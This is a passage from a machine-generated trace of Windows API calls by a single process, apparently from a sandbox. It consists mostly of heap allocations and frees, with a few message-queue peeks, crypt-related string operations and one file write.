hHeap=0x970000) returned 1 [0220.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0220.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0220.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fc8 [0220.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0220.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0220.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0220.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0220.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0220.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0220.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ff8 [0220.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0220.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51190 [0220.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0220.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0220.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0220.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0220.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0220.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0220.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0220.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0220.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0220.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0220.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0220.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0220.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0220.659] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0220.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0220.659] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0220.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0220.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0220.659] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0220.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0220.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0220.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51208 [0220.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0220.660] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0220.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0220.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0220.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0220.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0220.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0220.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0220.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0220.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0220.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0220.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0220.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0220.660] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0220.660] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0220.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0220.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0220.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0220.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0220.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0220.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0220.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0220.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0220.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0220.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0220.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0220.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0220.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119e8) returned 0x2ea3710 [0220.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0220.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0220.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119e8) returned 0x2ec6af0 [0220.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0220.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0220.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea3710 | out: hHeap=0x970000) returned 1 [0220.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0220.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0220.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0220.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0220.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0220.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119e8) returned 0x2ea3710 [0220.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ec6af0 | out: hHeap=0x970000) returned 1 [0220.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0220.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0220.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119e8) returned 0x2ec6af0 [0220.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea3710 | out: hHeap=0x970000) returned 1 [0220.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0220.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0220.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0220.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0220.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0220.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0220.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0220.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0220.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0220.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0220.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e91d20 | out: hHeap=0x970000) returned 1 [0220.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0220.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0220.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0220.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0220.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0220.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0220.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0220.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0220.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0220.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0220.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0220.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0220.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0220.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0220.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0220.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0220.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0220.667] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0220.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0220.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0220.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0220.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0220.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0220.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eb5100 | out: hHeap=0x970000) returned 1 [0220.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0220.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0220.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0220.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0220.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0220.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0220.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0220.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0220.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0220.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0220.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0220.673] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24820 | out: hHeap=0x970000) returned 1 [0220.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0220.674] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0220.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0220.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0220.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0220.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0220.675] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f36210 | out: hHeap=0x970000) returned 1 [0220.677] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0220.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0220.677] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119e8) returned 0x2ed84e0 [0220.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ec6af0 | out: hHeap=0x970000) returned 1 [0220.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0220.680] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0220.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0220.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0220.680] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0220.680] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0220.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0220.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0220.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0220.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0220.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0220.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0220.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119e8) returned 0x2ee9ed0 [0220.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0220.683] WriteFile (in: hFile=0x2d0, lpBuffer=0x2ee9ed0*, nNumberOfBytesToWrite=0x119e8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2ee9ed0*, lpNumberOfBytesWritten=0x8cf5e4*=0x119e8, lpOverlapped=0x0) returned 1 [0220.686] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0220.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ee9ed0 | out: hHeap=0x970000) returned 1 [0220.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0220.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0220.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0220.687] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0220.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0220.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0220.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0220.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0220.687] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0220.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0220.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0220.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0220.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0220.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0220.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0220.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f80 [0220.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0220.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0220.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0220.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0220.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0220.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0220.687] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0220.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0220.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0220.687] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0220.688] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0220.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0220.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55008 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0220.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f620 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0220.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0220.688] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 